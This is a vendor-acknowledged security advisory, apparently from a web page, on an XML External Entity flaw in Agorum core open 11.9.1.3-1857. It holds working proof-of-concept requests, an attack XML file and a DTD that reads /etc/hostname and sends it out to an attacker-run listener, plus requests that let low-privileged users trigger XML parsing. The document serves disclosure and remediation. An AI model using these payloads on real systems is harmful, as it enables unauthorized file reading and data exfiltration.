{"id":24243,"date":"2025-06-27T16:07:57","date_gmt":"2025-06-27T14:07:57","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0024\/"},"modified":"2025-07-01T10:22:37","modified_gmt":"2025-07-01T08:22:37","slug":"usd-2025-0024","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0024\/","title":{"rendered":"usd-2025-0024"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2025-0024 | Agorum core open 11.9.1.3-1857 - Improper Restriction of XML External Entity Reference<\/h1>\n

<\/h1>\n

Product<\/strong>: Agorum core open
Affected Version<\/strong>: 11.9.1.3-1857
Vulnerability Type<\/strong>: Improper Restriction of XML External Entity Reference (CWE-611)
Security Risk<\/strong>: High
Vendor<\/strong>: Agorum
Vendor URL<\/strong>: https:\/\/www.agorum.com\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: Requested
CVE Link<\/strong>: Requested
Advisory ID<\/strong>: usd-2025-0024<\/p>\n

Description<\/h3>\n

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n

Proof of Concept<\/h3>\n

agorum core is susceptible to improper restriction of XML External Entity (XXE) references across multiple components. This vulnerability enables attackers to manipulate XML input, exposing sensitive data.<\/p>\n

RSSReader<\/strong><\/p>\n

The RSSReader component of the submodule desk4web located in agorumcore\/jboss\/server\/default\/deploy\/roi.ear\/roiwebui.war\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp<\/strong> can be used to read arbitrary files via XXE in the feed<\/strong> parameter. The following request can be executed without prior authentication:<\/p>\n

\n
<\/span>GET<\/span> \/roiwebui\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp?reloadTime=600000&feed=[http:\/\/localhost:8000\/attack.xml]()<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost
<\/span>[...]<\/span><\/pre>\n<\/div>\n
As demonstrated, it is possible to load an external XML file via the feed<\/strong> parameter. For example, a malicious file crafted by an attacker could look like the following:<\/p>\n
\n
<\/span><!DOCTYPE item [<\/span><!ENTITY % remote SYSTEM \"[http:\/\/localhost:8000\/xxe.dtd\"><\/span>]()%remote;%intern;%xxe; <\/span>]>
<item>
<\/span>    <\/span><title><\/span>&xxe;<\/span><\/title>
<\/span>    <\/span><summary><\/span>test<\/summary><\/span><\/item><\/span><\/pre>\n<\/div>\n
The referecend xxe.dtd<\/strong> could be created as follows:<\/p>\n
\n
<\/span><!ENTITY % payl SYSTEM \"file:\/\/\/etc\/hostname\">
<\/span><!ENTITY % intern \"<!ENTITY % xxe SYSTEM '[http:\/\/localhost:8000\/%payl;'><\/span>\">]()<\/pre>\n<\/div>\n
Initially, the attack.xml<\/strong> file is requested, which defines an external entity pointing to the attacker-controlled xxe.dtd. Upon loading the DTD, the parser is instructed to access the local file \/etc\/hostname<\/strong>, allowing the attacker to exfiltrate its contents through a subsequent request.<\/p>\n
Agorum Explorer<\/strong><\/p>\n
XML files can be uploaded via Agorum Explorer, as illustrated in the following screenshot:<\/p>\n
\"\"<\/p>\n
An administrative user can execute XML by right-clicking and selecting Administration -> Execute XML.<\/p>\n
\"\"<\/p>\n
The attack then proceeds in the same manner as previously demonstrated in the RSSReader component.<\/p>\n
Additionally, it is notable that low-privileged users cannot access the administrative menu in the web UI to execute XML, as shown in the following screenshot:<\/p>\n
\"\"<\/p>\n
However, the request sent to the server when an administrative user executes XML can also be triggered within a low-privileged session. A low-privileged user can send the following request to execute XML for their uploaded file:<\/p>\n
\n
<\/span>POST<\/span> \/api\/rest\/filingAssistant\/v2\/action<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost
<\/span>Cookie<\/span>:<\/span> JSESSIONID=[REDACTED];
<\/span>User-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:128.0) Gecko\/20100101 Firefox\/128.0
<\/span>Accept<\/span>:<\/span> application\/json
<\/span>Accept-Language<\/span>:<\/span> en-US,en;q=0.5
<\/span>Accept-Encoding<\/span>:<\/span> gzip, deflate, br
<\/span>Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8
<\/span>X-Requested-With<\/span>:<\/span> XMLHttpRequest
<\/span>Content-Length<\/span>:<\/span> 79
<\/span>Origin<\/span>:<\/span> [https:\/\/localhost]()
<\/span>Referer<\/span>:<\/span> [https:\/\/localhost\/roiwebui\/aguila_module\/?type=agorum.home&_nc=-1495020701]()
<\/span>Sec-Fetch-Dest<\/span>:<\/span> empty
<\/span>Sec-Fetch-Mode<\/span>:<\/span> cors
<\/span>Sec-Fetch-Site<\/span>:<\/span> same-origin
<\/span>Te<\/span>:<\/span> trailers
<\/span>Connection<\/span>:<\/span> keep-alive<\/span><\/pre>\n
 <\/p>\n
name<\/span>=<\/span>XMLAusf%C3%BChren<\/span>&<\/span>ids<\/span>=<\/span>%5b%221150481%22%5d<\/span>&<\/span>preliminary<\/span>=<\/span>&<\/span>source<\/span>=<\/span>&<\/span>data<\/span>=<\/span>%7B%7D<\/span><\/p>\n<\/div>\n
The only requirement is the object ID of the file, which is needed for the ids<\/strong> parameter. This ID can be easily obtained from the object information, accessible to low-privileged users in the web UI, as shown in the following screenshot:<\/p>\n
\"\"<\/p>\n
Desk4Web<\/strong><\/p>\n
The same behavior observed in the Explorer is present in the Desk4Web component. When an administrative user uploads an XML file, a checkbox appears to parse the XML after uploading, as shown in the following screenshot:<\/p>\n
\"\"<\/p>\n
In contrast, low-privileged users do not have the option to select a checkbox to parse the XML in the web UI:<\/p>\n
\"\"<\/p>\n
However, the parameter can be added in the server request multiform to the backend which allows then also to parse XML as a low privileged user. For this, the following parameter must be appended to the multiform:<\/p>\n
\n
<\/span>Content-Disposition: form-data; name=\"attribute(parseFile)\"<\/span>true<\/span><\/pre>\n<\/div>\n
Fix<\/h3>\n

It is recommended to configure XML parsers securely by disabling the processing of external entities and DTDs. Developers should also rely on secure parsing options or libraries specifically hardened against XXE attacks. Furthermore, validating and sanitizing all XML input can significantly reduce the risk of exploitation.<\/p>\n
 <\/p>\n
Users of agorum core open can upgrade to versions 11.9.2 or 11.10.1.<\/p>\n
References<\/h3>\n
<\/p>\n